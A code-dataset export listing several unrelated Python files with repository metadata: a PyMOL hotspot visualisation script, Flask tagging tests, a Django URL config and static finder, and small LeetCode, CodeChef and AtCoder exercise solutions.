blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8df7dd01776154eb4b7f0fa22d4f39e34f89562b | 18305efd1edeb68db69880e03411df37fc83b58b | /pdb_files3000rot/fb/2fb8/tractability_500/pymol_results_file.py | 8fb6f70e459bfef541c1964fba987ec98a526281 | [] | no_license | Cradoux/hotspot_pipline | 22e604974c8e38c9ffa979092267a77c6e1dc458 | 88f7fab8611ebf67334474c6e9ea8fc5e52d27da | refs/heads/master | 2021-11-03T16:21:12.837229 | 2019-03-28T08:31:39 | 2019-03-28T08:31:39 | 170,106,739 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,223 | py |
from os.path import join
import tempfile
import zipfile
from pymol import cmd, finish_launching
from pymol.cgo import *
# Start the PyMOL session before issuing any cmd.* calls.
finish_launching()
# Temp extraction dir for the zipped hotspot results; set for real below.
dirpath = None
def cgo_arrow(atom1='pk1', atom2='pk2', radius=0.07, gap=0.0, hlength=-1, hradius=-1, color='blue red', name=''):
    """Build a CGO arrow (cylinder shaft + cone head) from atom1 to atom2.

    atom1/atom2 may be PyMOL selections, '[x, y, z]' literal strings, or
    coordinate sequences.  color is either one colour name or two separated
    by a space (shaft colour, head colour).  Returns the CGO primitive list;
    `name` is accepted for caller compatibility but unused here.
    """
    from chempy import cpv
    radius, gap = float(radius), float(gap)
    hlength, hradius = float(hlength), float(hradius)
    try:
        color1, color2 = color.split()
    except ValueError:  # was a bare except; only the 2-way unpack can fail here
        color1 = color2 = color
    color1 = list(cmd.get_color_tuple(color1))
    color2 = list(cmd.get_color_tuple(color2))

    def get_coord(v):
        """Resolve a selection / '[x,y,z]' string / sequence to coordinates."""
        if not isinstance(v, str):
            return v
        if v.startswith('['):
            return cmd.safe_list_eval(v)
        return cmd.get_atom_coords(v)

    xyz1 = get_coord(atom1)
    xyz2 = get_coord(atom2)
    normal = cpv.normalize(cpv.sub(xyz1, xyz2))
    # Default head size scales with the shaft radius.
    if hlength < 0:
        hlength = radius * 3.0
    if hradius < 0:
        hradius = hlength * 0.6
    if gap:
        # Pull both endpoints inwards by `gap` along the arrow axis.
        diff = cpv.scale(normal, gap)
        xyz1 = cpv.sub(xyz1, diff)
        xyz2 = cpv.add(xyz2, diff)
    xyz3 = cpv.add(cpv.scale(normal, hlength), xyz2)
    # CYLINDER/CONE come from `from pymol.cgo import *`; the original used
    # `cgo.CYLINDER`/`cgo.CONE`, but no `cgo` module name is imported in this
    # script, which would raise NameError at call time.
    obj = [CYLINDER] + xyz1 + xyz3 + [radius] + color1 + color2 + [CONE] + xyz3 + xyz2 + [hradius, 0.0] + color2 + color2 + [1.0, 0.0]
    return obj
# Unpack the bundled hotspot results into a temp dir and load the protein.
dirpath = tempfile.mkdtemp()
zip_dir = 'out.zip'
with zipfile.ZipFile(zip_dir) as hs_zip:
    hs_zip.extractall(dirpath)
cmd.load(join(dirpath,"protein.pdb"), "protein")
cmd.show("cartoon", "protein")
# Score labels for threshold 10: geometry hidden, atom names shown as text.
if dirpath:
    f = join(dirpath, "label_threshold_10.mol2")
else:
    f = "label_threshold_10.mol2"
cmd.load(f, 'label_threshold_10')
cmd.hide('everything', 'label_threshold_10')
cmd.label("label_threshold_10", "name")
cmd.set("label_font_id", 7)
cmd.set("label_size", -0.4)
# Score labels for threshold 14.
if dirpath:
    f = join(dirpath, "label_threshold_14.mol2")
else:
    f = "label_threshold_14.mol2"
cmd.load(f, 'label_threshold_14')
cmd.hide('everything', 'label_threshold_14')
cmd.label("label_threshold_14", "name")
cmd.set("label_font_id", 7)
cmd.set("label_size", -0.4)
# Score labels for threshold 17.
if dirpath:
    f = join(dirpath, "label_threshold_17.mol2")
else:
    f = "label_threshold_17.mol2"
cmd.load(f, 'label_threshold_17')
cmd.hide('everything', 'label_threshold_17')
cmd.label("label_threshold_17", "name")
cmd.set("label_font_id", 7)
cmd.set("label_size", -0.4)
# Colour per probe type; only donor/apolar/acceptor grids exist in this bundle.
colour_dict = {'acceptor':'red', 'donor':'blue', 'apolar':'yellow', 'negative':'purple', 'positive':'cyan'}
threshold_list = [10, 14, 17]
gfiles = ['donor.grd', 'apolar.grd', 'acceptor.grd']
grids = ['donor', 'apolar', 'acceptor']
num = 0  # hotspot index; this generated script contains a single hotspot
surf_transparency = 0.2
if dirpath:
    gfiles = [join(dirpath, g) for g in gfiles]
# Build one coloured, semi-transparent isosurface per (grid, threshold) and
# group surfaces + labels per threshold, then per hotspot.
for t in threshold_list:
    for i in range(len(grids)):
        try:
            cmd.load(r'%s'%(gfiles[i]), '%s_%s'%(grids[i], str(num)))
            cmd.isosurface('surface_%s_%s_%s'%(grids[i], t, num), '%s_%s'%(grids[i], num), t)
            cmd.set('transparency', surf_transparency, 'surface_%s_%s_%s'%(grids[i], t, num))
            cmd.color(colour_dict['%s'%(grids[i])], 'surface_%s_%s_%s'%(grids[i], t, num))
            cmd.group('threshold_%s'%(t), members = 'surface_%s_%s_%s'%(grids[i],t, num))
            cmd.group('threshold_%s' % (t), members='label_threshold_%s' % (t))
        except:  # generated script is best-effort: skip any grid that fails
            continue
    try:
        cmd.group('hotspot_%s' % (num), members='threshold_%s' % (t))
    except:  # best-effort grouping, as above
        continue
# Also collect the raw grid objects under the hotspot group.
for g in grids:
    cmd.group('hotspot_%s' % (num), members='%s_%s' % (g,num))
# Pharmacophore features for the cluster scored 16.9200000763 (generated data).
# Spheres mark feature positions; CGO arrows point towards the interacting
# protein atom.  COLOR (0,0,1) = donor (blue), (1,1,0) = apolar (yellow),
# (1,0,0) = acceptor (red), matching colour_dict above.
cluster_dict = {"16.9200000763":[], "16.9200000763_arrows":[]}
cluster_dict["16.9200000763"] += [COLOR, 0.00, 0.00, 1.00] + [ALPHA, 0.6] + [SPHERE, float(-44.0), float(28.5), float(-4.5), float(1.0)]
cluster_dict["16.9200000763_arrows"] += cgo_arrow([-44.0,28.5,-4.5], [-45.62,26.402,-4.591], color="blue red", name="Arrows_16.9200000763_1")
cluster_dict["16.9200000763"] += [COLOR, 0.00, 0.00, 1.00] + [ALPHA, 0.6] + [SPHERE, float(-44.0), float(20.0), float(-2.5), float(1.0)]
cluster_dict["16.9200000763_arrows"] += cgo_arrow([-44.0,20.0,-2.5], [-46.141,20.536,-3.622], color="blue red", name="Arrows_16.9200000763_2")
cluster_dict["16.9200000763"] += [COLOR, 0.00, 0.00, 1.00] + [ALPHA, 0.6] + [SPHERE, float(-43.5), float(31.5), float(-3.0), float(1.0)]
cluster_dict["16.9200000763_arrows"] += cgo_arrow([-43.5,31.5,-3.0], [-45.565,31.015,-1.188], color="blue red", name="Arrows_16.9200000763_3")
cluster_dict["16.9200000763"] += [COLOR, 0.00, 0.00, 1.00] + [ALPHA, 0.6] + [SPHERE, float(-37.0), float(24.0), float(-0.5), float(1.0)]
cluster_dict["16.9200000763_arrows"] += cgo_arrow([-37.0,24.0,-0.5], [-35.435,21.826,0.786], color="blue red", name="Arrows_16.9200000763_4")
cluster_dict["16.9200000763"] += [COLOR, 0.00, 0.00, 1.00] + [ALPHA, 0.6] + [SPHERE, float(-34.5), float(29.0), float(-1.0), float(1.0)]
cluster_dict["16.9200000763_arrows"] += cgo_arrow([-34.5,29.0,-1.0], [-32.426,27.812,-0.09], color="blue red", name="Arrows_16.9200000763_5")
cluster_dict["16.9200000763"] += [COLOR, 1.00, 1.000, 0.000] + [ALPHA, 0.6] + [SPHERE, float(-39.4049044046), float(27.8836362845), float(-0.685739447518), float(1.0)]
cluster_dict["16.9200000763"] += [COLOR, 1.00, 0.00, 0.00] + [ALPHA, 0.6] + [SPHERE, float(-44.5), float(23.0), float(-2.5), float(1.0)]
cluster_dict["16.9200000763_arrows"] += cgo_arrow([-44.5,23.0,-2.5], [-47.478,23.36,-2.426], color="red blue", name="Arrows_16.9200000763_6")
cluster_dict["16.9200000763"] += [COLOR, 1.00, 0.00, 0.00] + [ALPHA, 0.6] + [SPHERE, float(-42.0), float(22.5), float(-3.5), float(1.0)]
cluster_dict["16.9200000763_arrows"] += cgo_arrow([-42.0,22.5,-3.5], [-42.43,23.173,-6.066], color="red blue", name="Arrows_16.9200000763_7")
cluster_dict["16.9200000763"] += [COLOR, 1.00, 0.00, 0.00] + [ALPHA, 0.6] + [SPHERE, float(-40.5), float(22.5), float(0.0), float(1.0)]
cluster_dict["16.9200000763_arrows"] += cgo_arrow([-40.5,22.5,0.0], [-38.239,21.157,0.384], color="red blue", name="Arrows_16.9200000763_8")
cluster_dict["16.9200000763"] += [COLOR, 1.00, 0.00, 0.00] + [ALPHA, 0.6] + [SPHERE, float(-36.0), float(25.5), float(0.5), float(1.0)]
cluster_dict["16.9200000763_arrows"] += cgo_arrow([-36.0,25.5,0.5], [-32.936,24.781,0.433], color="red blue", name="Arrows_16.9200000763_9")
# Load the feature spheres and arrows as CGO objects and group them into a
# single pharmacophore, together with its per-cluster score labels.
cmd.load_cgo(cluster_dict["16.9200000763"], "Features_16.9200000763", 1)
cmd.load_cgo(cluster_dict["16.9200000763_arrows"], "Arrows_16.9200000763")
cmd.set("transparency", 0.2,"Features_16.9200000763")
cmd.group("Pharmacophore_16.9200000763", members="Features_16.9200000763")
cmd.group("Pharmacophore_16.9200000763", members="Arrows_16.9200000763")
if dirpath:
    f = join(dirpath, "label_threshold_16.9200000763.mol2")
else:
    f = "label_threshold_16.9200000763.mol2"
cmd.load(f, 'label_threshold_16.9200000763')
cmd.hide('everything', 'label_threshold_16.9200000763')
cmd.label("label_threshold_16.9200000763", "name")
cmd.set("label_font_id", 7)
cmd.set("label_size", -0.4)
cmd.group('Pharmacophore_16.9200000763', members= 'label_threshold_16.9200000763')
# Final scene cosmetics.
cmd.bg_color("white")
cmd.show("cartoon", "protein")
cmd.color("slate", "protein")
cmd.show("sticks", "organic")
cmd.hide("lines", "protein")
| [
"[email protected]"
] | |
ff7083adfde7388d3ad49880c60d023bb42fb506 | 637dc502d7326aaf34766c14512df10efc612516 | /tests/tagging.py | ad96eba03df498646cc4d0068da3bb5f3a49d3cf | [] | no_license | z4y4ts/unshred-tag | 085342c6ee886a8c8e9aff154ae78123e0f19833 | 08d508b964fc52c5881b11a7811cc172036247f6 | refs/heads/master | 2020-12-25T04:19:05.171352 | 2014-11-12T22:54:50 | 2014-11-12T22:54:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,124 | py | import re
from datetime import datetime
from flask import url_for
from models import Tags, User, Shreds, TaggingSpeed
from . import BasicTestCase
class TaggingTest(BasicTestCase):
    """Integration tests for the shred-tagging workflow (Python 2 codebase:
    note ``xrange`` and bytes-in-str membership checks below).

    Each test runs against a freshly reset DB seeded with the base tags via
    the fixtures endpoints.
    """

    def setUp(self):
        # Reset the database and recreate the base tag fixtures per test.
        self.client.post(url_for("fixtures.reset_db"))
        self.client.post(url_for("fixtures.create_base_tags"))

    def test_index_not_logged(self):
        """Anonymous index shows the welcome block and all social logins."""
        res = self.client.get(url_for("index"))
        self.assert200(res)
        body = res.get_data(as_text=True)
        self.assertTrue("warm-welcome" in body)
        self.assertTrue(url_for("social.auth", backend="facebook") in body)
        self.assertTrue(url_for("social.auth", backend="twitter") in body)
        self.assertTrue(
            url_for("social.auth", backend="google-oauth2") in body)
        self.assertTrue(
            url_for("social.auth", backend="vk-oauth2") in body)

    def test_index_logged(self):
        """Logged-in index hides the welcome/login block and lists base tags."""
        self.create_user_and_login("user")
        res = self.client.get(url_for("index"))
        self.assert200(res)
        body = res.get_data(as_text=True)
        self.assertFalse("warm-welcome" in body)
        self.assertFalse(url_for("social.auth", backend="facebook") in body)
        self.assertFalse(url_for("social.auth", backend="twitter") in body)
        self.assertFalse(
            url_for("social.auth", backend="google-oauth2") in body)
        self.assertFalse(
            url_for("social.auth", backend="vk-oauth2") in body)
        # Every base tag must be rendered with its category and hotkey.
        for tag in Tags.objects(is_base=True):
            self.assertTrue(tag.title.lower() in body.lower())
            self.assertTrue(tag.category.lower() in body.lower())
            if tag.hotkey:
                self.assertTrue(tag.hotkey in body.lower())

    def test_no_more_tasks(self):
        """Without shreds in the DB, /next renders no tagging form."""
        self.create_user_and_login("user")
        res = self.client.get(url_for("next"))
        self.assert200(res)
        body = res.get_data(as_text=True)
        self.assertFalse("shred_id" in body)
        self.assertFalse(url_for("next") in body)

    def test_has_some_tasks(self):
        """With shreds present, /next renders the tagging form and base tags."""
        self.create_user_and_login("user")
        self.client.post(url_for("fixtures.create_shreds"))
        res = self.client.get(url_for("next"))
        self.assert200(res)
        body = res.get_data(as_text=True)
        self.assertTrue("shred_id" in body)
        self.assertTrue(url_for("next") in body)
        for tag in Tags.objects(is_base=True):
            self.assertTrue(
                tag.title.capitalize().encode('unicode-escape') in body)

    def test_user_tags_in_task(self):
        """A user sees their own tags (after base tags) but not other users'."""
        self.create_user_and_login("user")
        self.client.post(url_for("fixtures.create_shreds"))
        user = User.objects.get(username="user")
        admin = User.objects.get(username="admin")
        user_tag = "foobar"
        another_user_tag = "barfoo"
        Tags.objects.create(title=user_tag, is_base=False,
                            created_by=user)
        Tags.objects.create(title=another_user_tag, is_base=False,
                            created_by=admin)
        user.tags = [user_tag]
        admin.tags = [another_user_tag]
        user.save()
        admin.save()
        res = self.client.get(url_for("next"))
        self.assert200(res)
        body = res.get_data(as_text=True)
        self.assertTrue(
            user_tag.capitalize().encode('unicode-escape') in body)
        pos = body.index(user_tag.capitalize().encode('unicode-escape'))
        self.assertFalse(
            another_user_tag.capitalize().encode('unicode-escape') in body)
        # All base tags appear, and every one of them before the user's tag.
        for tag in Tags.objects(is_base=True):
            tag = tag.title.capitalize().encode('unicode-escape')
            self.assertTrue(tag in body)
            self.assertTrue(body.index(tag) < pos)

    def test_tags_ordering_in_task(self):
        """Tags with more usages are rendered earlier on the tagging page."""
        self.create_user_and_login("user")
        self.client.post(url_for("fixtures.create_shreds"))
        first_tag = Tags.objects[0]
        new_first_tag = Tags.objects[1]
        new_first_tag.usages = 100
        new_first_tag.save()
        res = self.client.get(url_for("next"))
        self.assert200(res)
        body = res.get_data(as_text=True)
        self.assertTrue(
            body.index(first_tag.title.capitalize().encode('unicode-escape')) >
            body.index(
                new_first_tag.title.capitalize().encode('unicode-escape'))
        )

    def test_auto_tags(self):
        """A shred suggestion matching a tag synonym renders that tag again
        as a pre-suggested (auto) tag, so its title appears twice."""
        self.create_user_and_login("user")
        self.client.post(url_for("fixtures.create_shreds"))
        tag = Tags.objects.create(title="my new tag",
                                  synonyms=["foobar_synonym"],
                                  is_base=True)
        res = self.client.get(url_for("next"))
        self.assert200(res)
        body = res.get_data(as_text=True)
        self.assertEquals(
            body.count(tag.title.capitalize().encode('unicode-escape')), 1)
        Shreds.objects.update(add_to_set__tags_suggestions=["foobar_synonym"])
        res = self.client.get(url_for("next"))
        self.assert200(res)
        body = res.get_data(as_text=True)
        self.assertEquals(
            body.count(tag.title.capitalize().encode('unicode-escape')), 2)

    def parse_shred_id(self, body):
        """Extract the current shred id from the rendered tagging page."""
        pattern = r'id="shred_id".*?"([^"]*)"'
        m = re.search(pattern, body)
        return m.group(1)

    def test_skipping(self):
        """Skipping cycles through all shreds; the 11th request wraps back to
        the first shred and its skip record is cleared."""
        self.create_user_and_login("user")
        user = User.objects.get(username="user")
        self.assertEqual(user.skipped, 0)
        self.assertEqual(user.processed, 0)
        self.client.post(url_for("fixtures.create_shreds"))
        res = self.client.get(url_for("next"))
        self.assert200(res)
        body = res.get_data(as_text=True)
        current_shred_id = first_shred_id = self.parse_shred_id(body)
        # Skip 9 further shreds; none of them should be the first one again.
        for i in xrange(9):
            res = self.client.post(url_for("skip"),
                                   data={"_id": current_shred_id},
                                   follow_redirects=True)
            body = res.get_data(as_text=True)
            self.assert200(res)
            current_shred_id = self.parse_shred_id(body)
            self.assertNotEqual(current_shred_id, first_shred_id)
        self.assertEqual(
            len(Shreds.objects(id=first_shred_id).first().users_skipped), 1)
        # One more skip exhausts the queue and serves the first shred again,
        # resetting its skip record.
        res = self.client.post(url_for("skip"),
                               data={"_id": current_shred_id},
                               follow_redirects=True)
        body = res.get_data(as_text=True)
        self.assert200(res)
        current_shred_id = self.parse_shred_id(body)
        self.assertEqual(current_shred_id, first_shred_id)
        self.assertEqual(
            len(Shreds.objects(id=first_shred_id).first().users_skipped), 0)
        user.reload()
        self.assertEqual(user.skipped, 10)
        self.assertEqual(user.processed, 0)

    def test_valid_tagging(self):
        """Submitting tags stores a deduplicated, lower-cased tag list on the
        shred, updates user/tag counters and records tagging speed."""
        self.create_user_and_login("user")
        user = User.objects.get(username="user")
        self.assertEqual(user.skipped, 0)
        self.assertEqual(user.processed, 0)
        self.assertEqual(user.tags_count, 0)
        self.assertEqual(TaggingSpeed.objects.count(), 0)
        new_tags = ["foo", "bar"]
        self.client.post(url_for("fixtures.create_shreds"))
        res = self.client.get(url_for("next"))
        self.assert200(res)
        body = res.get_data(as_text=True)
        current_shred_id = self.parse_shred_id(body)
        current_shred = Shreds.objects.get(id=current_shred_id)
        self.assertEqual(current_shred.get_user_tags(user), None)
        # Mixed-case duplicates should collapse to the two canonical tags.
        res = self.client.post(
            url_for("next"), data={
                "_id": current_shred_id,
                "recognizable_chars": "foo\nbar\nfoo",
                "angle": 90,
                "tags": ["FOO", "foo", "Bar", "bAR"],
                "tagging_start": datetime.utcnow()
            })
        body = res.get_data(as_text=True)
        self.assert200(res)
        new_shred_id = self.parse_shred_id(body)
        current_shred.reload()
        user.reload()
        user_tag = current_shred.get_user_tags(user)
        self.assertNotEqual(new_shred_id, current_shred_id)
        self.assertEqual(user_tag.tags, new_tags)
        self.assertEqual(user_tag.angle, 90)
        self.assertEqual(user_tag.recognizable_chars, "foo\nbar\nfoo")
        self.assertEqual(current_shred.users_count, 1)
        self.assertEqual(current_shred.users_skipped, [])
        self.assertEqual(current_shred.users_processed[0].username,
                         user.username)
        self.assertEqual(user.skipped, 0)
        self.assertEqual(user.processed, 1)
        self.assertEqual(user.tags_count, 2)
        self.assertEqual(user.tags, new_tags)
        self.assertEqual(TaggingSpeed.objects.count(), 1)
        # Each submitted tag becomes a non-base Tags document linked back to
        # the shred and its creator.
        for tag_name in new_tags:
            tag = Tags.objects.get(title=tag_name)
            self.assertEqual(tag.is_base, False)
            self.assertEqual(tag.usages, 1)
            self.assertEqual(tag.shreds[0].id, current_shred_id)
            self.assertEqual(tag.created_by.username, user.username)
| [
"[email protected]"
] | |
99f52224cafb2ac12626c08b6cf0c418c1771a14 | b445dd915a74d67b988c39f525f0235e26ff7db2 | /djangoProjects/simpleBootStrapForms/src/base/urls.py | af3b4baf3553adb6bc5e1237ee342304a8a8b13c | [] | no_license | rajesh241/projects | 2a1024400151fcbdd8790a3683d909da40612719 | c6adfb7ec2f7df4880de44c50960333142569e54 | refs/heads/master | 2022-12-11T13:55:14.069601 | 2020-02-19T23:57:09 | 2020-02-19T23:57:09 | 228,992,081 | 0 | 0 | null | 2022-06-22T01:10:45 | 2019-12-19T06:42:25 | Python | UTF-8 | Python | false | false | 807 | py | """base URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from survey.views import forms_view
# Route the Django admin; the survey form view handles the site root.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', forms_view),
]
| [
"[email protected]"
] | |
698a03e7e32842e8b104e0c82b939b34a766192e | 0306bea08e9aab18f34a799ce8a73e86921f90f7 | /medium/MergeInBetweenLinkedLists.py | 8ec144cd18dc8a581543cea87bfb41b24ae965b0 | [] | no_license | GeorgianBadita/LeetCode | 78686fde88ef65b64f84fb7c2a22ba37ef21b8d9 | e3b0571182369c5308e0c29fb87106bb0b0d615a | refs/heads/master | 2022-10-21T00:23:26.479943 | 2022-10-14T20:27:27 | 2022-10-14T20:27:27 | 251,733,951 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 801 | py | # https://leetcode.com/submissions/detail/427432636/
# Definition for singly-linked list.
class ListNode:
    """Singly linked list node."""
    def __init__(self, val=0, next=None):
        self.val = val
        self.next = next


class Solution:
    def mergeInBetween(
        self, list1: ListNode, a: int, b: int, list2: ListNode
    ) -> ListNode:
        """Replace nodes a..b (inclusive, 0-indexed) of list1 with list2.

        Expects a >= 1 and b before the last node, as in the original
        implementation.  Returns the head of the spliced list.
        """
        # Walk to the node just before position a.
        before = list1
        for _ in range(a - 1):
            before = before.next
        # Walk past the removed segment to the node just after position b.
        after = before.next
        for _ in range(b - a + 1):
            after = after.next
        # Locate the tail of list2.
        tail2 = list2
        while tail2.next is not None:
            tail2 = tail2.next
        # Splice: prefix -> list2 -> suffix.
        before.next = list2
        tail2.next = after
        return list1
"[email protected]"
] | |
3b0de834899f997d3899b7fac087eda59b03a816 | d8a541a2953c9729311059585bb0fca9003bd6ef | /Lists as stack ques/key_revolver (2).py | 51286e00570e0066dba3825aad1cc934c43e8eb8 | [] | no_license | grigor-stoyanov/PythonAdvanced | ef7d628d2b81ff683ed8dd47ee307c41b2276dd4 | 0a6bccc7faf1acaa01979d1e23cfee8ec29745b2 | refs/heads/main | 2023-06-10T09:58:04.790197 | 2021-07-03T02:52:20 | 2021-07-03T02:52:20 | 332,509,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 895 | py | from collections import deque
# Shooting game: fire bullets (LIFO) at locks (FIFO).  A shot opens the front
# lock when its value is <= the lock value; every shot costs money from the
# safe.  Reload after emptying the barrel.
bullet_cost = int(input())
gun_barrel = int(input())
bullets = list((map(int, input().split())))  # used as a stack (pop from end)
locks = deque(map(int, input().split()))     # used as a queue (pop from front)
safe_value = int(input())
current_bullet = 0  # position within the current barrel (1..gun_barrel)
while bullets and locks and gun_barrel > 0:
    for bullet in range(1, gun_barrel+1):
        current_bullet = bullet
        shot = bullets.pop()
        safe_value -= bullet_cost
        if shot <= locks[0]:
            # Lock opened.
            print('Bang!')
            locks.popleft()
            if not locks or not bullets:
                break
        else:
            # Missed; lock stays.
            print('Ping!')
            if not bullets:
                break
    # Reload only when the whole barrel was spent and bullets remain.
    if bullets and current_bullet == gun_barrel:
        current_bullet = 0
        print('Reloading!')
if not locks:
    print(f'{len(bullets)} bullets left. Earned ${safe_value}')
elif not bullets:
    print(f'Couldn\'t get through. Locks left: {len(locks)}')
| [
"[email protected]"
] | |
80f49f9ce84cd2ecb8d31318d2a7f46c6a0b878e | 4d3118fb51c7d42d22c1f1f3bbcbaebf5f0640d2 | /exercises/coin_flip.py | 4bceb538cd7f317864e00ff6d6a62c37a3b2f534 | [] | no_license | Gabkings/python-practise | d899d3d0a4094b9b272120ad2779cbe1c043f8db | bafc1fea60dfa6b7075204276fb6e3d857be2cbf | refs/heads/master | 2020-03-25T08:30:05.917168 | 2018-08-05T13:35:44 | 2018-08-05T13:35:44 | 143,615,891 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 191 | py | from random import random
def coin_flip():
    """Simulate one fair coin toss; return 'head' or 'tail'."""
    # random() is uniform on [0, 1); values above 0.5 count as heads,
    # exactly as in the original if/else version.
    return 'head' if random() > 0.5 else 'tail'
# Flip once at import time and print the outcome.
con = coin_flip()
print(con)
| [
"[email protected]"
] | |
1a21293667b3cb7e185302ffb7736a7bbe0494dd | 09ce9635b0e74ba178e98efd0d5229a25995713e | /submissions/pakencamp-2019-day3/a.py | b5e2b7089cb507bc4e2b8a16412a7f5128acf605 | [
"Unlicense"
] | permissive | m-star18/atcoder | 7575f1e1f3ee1dfa4a765493eb17b4ef0ad5f1f0 | 08e475810516602fa088f87daf1eba590b4e07cc | refs/heads/main | 2023-07-14T09:16:42.807150 | 2021-08-22T15:59:48 | 2021-08-22T15:59:48 | 364,458,316 | 1 | 0 | Unlicense | 2021-08-22T15:59:49 | 2021-05-05T04:13:03 | Python | UTF-8 | Python | false | false | 201 | py | import sys
# Competitive-programming boilerplate: fast buffered stdin readers.
read = sys.stdin.buffer.read
readline = sys.stdin.buffer.readline
readlines = sys.stdin.buffer.readlines
sys.setrecursionlimit(10 ** 7)
# Count of integers in the inclusive range [a, b].
a, b = map(int, readline().split())
print(b - a + 1)
| [
"[email protected]"
] | |
61122cf8d525f6b5435f3e7f4c654fba7e261694 | 714268a27bd4cc34ec053cb3d991012151554aad | /CodeChef/atTheGates.py | 1bf5f096ca7f90fe56773272969212d1e8a86d07 | [] | no_license | yashhR/competitive | 2b649011c2cea74eea8d9646bcfafc73743651eb | 37f2ec68b33828df4692bc23f28d532cb8d4a358 | refs/heads/master | 2022-11-10T04:53:47.634062 | 2020-06-22T16:43:03 | 2020-06-22T16:43:03 | 274,190,602 | 0 | 0 | null | 2020-06-22T16:36:02 | 2020-06-22T16:36:02 | null | UTF-8 | Python | false | false | 1,801 | py | '''
There is a table in front of you, with N coins placed in a row and numbered 1 through N from left to right.
For each coin, you know whether it is initially showing heads or tails. You have to perform exactly K operations.
In one operation, you should remove the rightmost coin present on the table,
and if this coin was showing heads right before it was removed, then you should also flip all the remaining coins.
(If a coin was showing heads, then after it is flipped, it is showing tails, and vice versa.)
The code needed to enter the temple is the number of coins which, after these K operations are performed,
have not been removed and are showing heads. Can you find this number? The fate of Persia lies in your hands…
Input:
The first line of the input contains a single integer T denoting the number of test cases.
The description of T test cases follows.
The first line of each test case contains two space-separated integers N and K.
The second line contains N space-separated characters.
For each valid i, the i-th of these characters is 'H' if the i-th coin is initially showing heads or 'T' if it is showing tails.
Output:
For each test case, print a single line containing one integer ― the number of coins that are showing heads after K operations.
'''
t = int(input())  # number of test cases
def how_many():
    """Read one test case from stdin and return the number of coins that
    remain showing heads after removing the k rightmost coins (flipping the
    rest whenever a removed coin showed heads)."""
    n, m = map(int, input().split())  # n coins, m removals (n unused directly)
    coins = list(input().split())     # 'H' / 'T' per coin, left to right
    def flip():
        # Invert every coin in place (H <-> T).
        for i in range(len(coins)):
            if coins[i] == "H":
                coins[i] = "T"
            else:
                coins[i] = "H"
    for i in range(m):
        # Removing a heads-up coin flips the rest; the removed coin's own
        # flip is irrelevant since it is popped immediately after.
        if coins[-1] == "H":
            flip()
        coins.pop()
    count = 0
    for i in range(len(coins)):
        if coins[i] == "H":
            count += 1
    return count
for i in range(t):
    print(how_many())
| [
"[email protected]"
] | |
c19f605ab193cc8be99874cea988ac066ac3e0a5 | 9f414bde21046a264f3189786a7180f9ffd79d30 | /web/web/finders.py | 74784abfe14fbff5f035c0d81326851720746e80 | [
"Apache-2.0"
] | permissive | rcbops/FleetDeploymentReporting | ebd0ca07f099bdcf4e231d734145307e8f9bb9a5 | aaab76706c8268d3ff3e87c275baee9dd4714314 | refs/heads/develop | 2020-03-21T16:09:25.757015 | 2019-02-26T16:15:52 | 2019-02-26T16:15:52 | 138,753,891 | 1 | 7 | Apache-2.0 | 2019-02-26T16:15:53 | 2018-06-26T14:58:06 | Python | UTF-8 | Python | false | false | 1,311 | py | import os
from django.apps import apps
from django.contrib.staticfiles import utils
from django.contrib.staticfiles.finders import BaseFinder
from django.core.files.storage import FileSystemStorage
class AngularTemplateFinder(BaseFinder):
    """Staticfiles finder limited to the web app's Angular HTML templates.

    Only ``list`` is implemented; the other finder hooks are inherited,
    unimplemented, from ``BaseFinder``.
    """

    storage_class = FileSystemStorage
    source_dir = 'static'
    app_name = 'web'

    def __init__(self, *args, **kwargs):
        """Attach a storage rooted at the app's static dir, if it exists."""
        config = apps.get_app_config(self.app_name)
        candidate = self.storage_class(
            os.path.join(config.path, self.source_dir)
        )
        # Keep the storage only when its directory is actually present.
        self.storage = candidate if os.path.isdir(candidate.location) else None
        super().__init__(*args, **kwargs)

    def list(self, ignore_patterns):
        """Yield (path, storage) for every template under ``web/html``.

        :param ignore_patterns: collection of glob patterns to skip
        :type ignore_patterns: list
        :yields: (path, storage object) tuple
        :ytype: tuple
        """
        if not self.storage.exists(''):
            return
        for path in utils.get_files(self.storage, ignore_patterns):
            if path.startswith('web/html') and path.endswith('.html'):
                yield path, self.storage
| [
"[email protected]"
] | |
